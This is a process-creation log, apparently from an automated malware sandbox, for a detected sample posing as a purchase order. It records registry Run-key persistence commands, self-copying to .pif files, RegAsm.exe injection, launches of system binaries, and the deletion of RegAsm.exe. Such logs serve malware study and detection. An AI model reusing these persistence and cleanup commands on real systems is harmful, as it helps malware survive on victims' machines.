Source: PURCHASED ORDER OF ENG091.exe	ReversingLabs: Detection: 60%
Source: PURCHASED ORDER OF ENG091.exe	Virustotal: Detection: 63%

Source: unknown	Process created: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe "C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe"
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif"
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"
Source: C:\Windows\SysWOW64\cmstp.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmmon32.exe "C:\Windows\SysWOW64\cmmon32.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\msdt.exe "C:\Windows\SysWOW64\msdt.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\msdt.exe "C:\Windows\SysWOW64\msdt.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\msdt.exe "C:\Windows\SysWOW64\msdt.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\chkdsk.exe "C:\Windows\SysWOW64\chkdsk.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif"	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif"	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\msdt.exe "C:\Windows\SysWOW64\msdt.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\msdt.exe "C:\Windows\SysWOW64\msdt.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\msdt.exe "C:\Windows\SysWOW64\msdt.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\chkdsk.exe "C:\Windows\SysWOW64\chkdsk.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
